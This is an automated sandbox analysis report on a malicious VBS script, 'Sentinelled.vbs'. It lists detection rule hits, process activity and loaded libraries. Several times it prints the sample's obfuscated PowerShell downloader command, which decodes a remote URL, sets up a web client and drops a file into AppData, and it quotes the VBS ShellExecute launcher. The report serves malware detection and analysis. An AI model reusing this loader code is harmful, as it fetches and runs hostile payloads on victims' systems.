Source: unknown	HTTPS traffic detected: 142.250.181.110:443 -> 192.168.2.7:49704 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi64_2104.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Call Hangability.ShellExecute( "p" + Betlehemsstjernen,Delkorallernes & Chitter & Delkorallernes ,"","",0)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillF
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillF			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC0F5252		2_2_00007FFAAC0F5252
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFAAC0F53FA		2_2_00007FFAAC0F53FA

Source: Sentinelled.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5810
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5810			Jump to behavior

Source: amsi64_2104.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2104, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.expl.evad.winVBS@4/5@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Unmidwifed.Sur

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1pd4hdj.u2l.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Sentinelled.vbs

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Sentinelled.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Stenternstantiates; function Husking($Sicklemia){$Afmilitariseringers=4;$Stenter=$Afmilitariseringers;do{$Musikgruppens+=$Sicklemia[$Stenter];$Stenter+=5} until(!$Sicklemia[$Stenter])$Musikgruppens}function Batiker179($Folketingsvalgenes){ .($opsamlingsbeholdernes) ($Folketingsvalgenes)}$opsamlingsbeholderens=Husking ' trnForsEBomut Dep.SeddW';$opsamlingsbeholderens+=Husking ' VulEUn.uBKontCIn.eLPsamiSupeEafskNSr uT';$Loppier=Husking 'BystMDrifo H mz .aaiNonslevaclUn oaAbor/';$Jalousidramaet=Husking 'FintTVenll rudsR ff1 bo 2';$Mhorr='Mid [ RanN.nimES yntPrst.SlagsEmboEApanr mpVHelaIBecacTrefESanspSkopoBegoI SnoNCharT Va,mF skA C tN.ammaInd.gForbEStyrR Q t]Lyco:Modt:K.imsDismE arecManou Ta R VlgiInortAareyproepsynsrYeasO Sl Tenmao VolcLtero FulL Ver=D,ed$K.lejKameAEdlalLayeOAnd.upressDel,I KetdHoveRBragaBaadM intA Im EE ekT';$Loppier+=Husking 'Fi l5.omm.Desp0H ck Besk(PoliWFraniOv rn MocdAmfeo onw F,rsL nk KommNkiriTEsth ,lem1Slde0In v.Tu n0 Muf;Omga OstWNondiHummnSou 6Elsd4 Apo;Ster Pi,fxSlag6 Va.4Nons;Vent Euour Snav Gro:Hale1 Ent3.voi1 Ame.Bygg0Intr)a ve coauGAnileMenacFlarkPostoRubi/ Kon2tat 0L.co1Tell0,bor0Snar1Bytn0Tabu1 Sti MecFDemiiBundr Bile Emif fmoSporxglau/Pref1Regi3Met.1Age .soli0';$Nedslidendes=Husking '.ontUA.stSTeleEBlepR Mes-PedaA ColgDes,eBrnen HalT';$Kjerstines=Husking 'Arv hForvtOpirtBlodpMelusOrbi:Enea/Lang/VenuoOpalfSyst1F ktxHugu.AfskiUdrac hrouFi.d/EuphYYu ekSoigHFartf.edlh FrlYFl,sCArcaF.igh/ onsghentlKra iHa,daBek.dO tsiPrean ConeModesPs k.St.lpLabof S nb';$Unsighted=Husking ' Met>';$opsamlingsbeholdernes=Husking 'Pre ISelveInd x';$Besprinkle='Libertine';$Beskaaret='\Unmidwifed.Sur';Batiker179 (Husking 'skum$ShilGCit l Ek.o GraBChriaTabel Col:HoredEghorCwm.y yklaHjrnsAl.c= ata$ ShaE FisNTypeVCest:Ua sA.acePO.rypSk kD ResaErv TIncoAPse + obe$heydbVocaeTracS ,orktr.pAUncoa illRFakteNo rt');Batiker179 (Husking 'Agla$A,stgsurmL DisODirgB linAuntrLFred:sproZSkkeo Albl H raSkabeProesOnonQPaasuOdyse Scr=Is.m$NvneK m,ljAfsieSkdeRMiliSRh,nt ctuIRustnPaleENl.tS,egi.AppeS Di PFumel Inditextt W e(.tev$ChrouVikiNSkrisRefiiHandG himhTrilTDrosEV njdAsfa)');Batiker179 (Husking $Mhorr);$Kjerstines=$Zolaesque[0];$Unplacement=(Husking ' Tra$PersGSan.L ,erOHedeB Th a.eseLAcme:SutssSadeUAftenModeB BacU ErgrTuyeNDaliIAr hnChroG ft=.uttN ,orENumaWV lt-UretoGa vB vej posEDrilcWindtvejv F tesDextyInteS,itmTRetme Fi m Fag. Sol$SupeoS quPnonrSBawdAOrchmGoo l arcI .amn F,aG hrySTellBPur.EChurHD naoYeell,entd.inse KonRRe eeBrevNSviks');Batiker179 ($Unplacement);Batiker179 (Husking 'tes,$,ommSGarduEkstnInfobS yruKhivr itenPar,iDemin.ncegRumi. U.fHDemue.erla St dPersepyrrrCoinsKore[Slut$MarkNAfdaeshagdTotasTrkglL vpiShocdDo.ueUnannsab.dKense Udgs Fil]Fors=Phos$SoliL IsooGarnpAlloppro,iYel ekoder');$karotiner=Husking 'Naad$Dai SConvuacran MisbTip,u ByprFarlnEm ri MednN rogBa.n.al aDKremoun ewP ecnFeldlEggco steaModtdBillF	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1777092431.000001CBA460C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32`e\ source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: wscript.exe, 00000001.00000003.1513781975.000002B3C7361000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1519808236.000002B3C7561000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bpdbtem.pdb source: powershell.exe, 00000002.00000002.1777827302.000001CBA464F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ll\mscorlib.pdb source: powershell.exe, 00000002.00000002.1778189960.000001CBA47F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.1778189960.000001CBA4790000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

